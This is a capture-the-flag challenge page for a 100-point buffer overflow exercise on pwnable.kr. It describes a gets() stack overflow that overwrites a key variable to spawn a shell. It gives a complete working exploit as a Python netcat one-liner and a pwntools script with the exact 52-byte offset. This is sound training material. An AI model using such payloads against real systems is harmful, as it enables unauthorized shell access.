← BACK TO CHALLENGES
PWNABLE

BOF

Buffer Overflow
100
POINTS
DESCRIPTION
A C program declares a 32-byte buffer and a key variable on the stack. It calls gets() - an unsafe function with no bounds checking. Supply more than 32 bytes to overflow the buffer and overwrite key. If key == 0xCAFEBABE, a shell is spawned. Connect via netcat and exploit it remotely.
HOW TO CONNECT
Connect via netcat (no SSH needed): nc pwnable.kr 9000 Exploit with Python: python3 -c "import sys; sys.stdout.buffer.write(b'A'*52 + b'\xbe\xba\xfe\xca')" | nc pwnable.kr 9000 Or use pwntools: pip install pwntools from pwn import * r = remote("pwnable.kr", 9000) r.sendline(b'A'*52 + p32(0xcafebabe)) r.interactive()
nc pwnable.kr 9000
SUBMIT FLAG
Login or register to submit flags and earn points.
Flags are found on the challenge server after successful exploitation.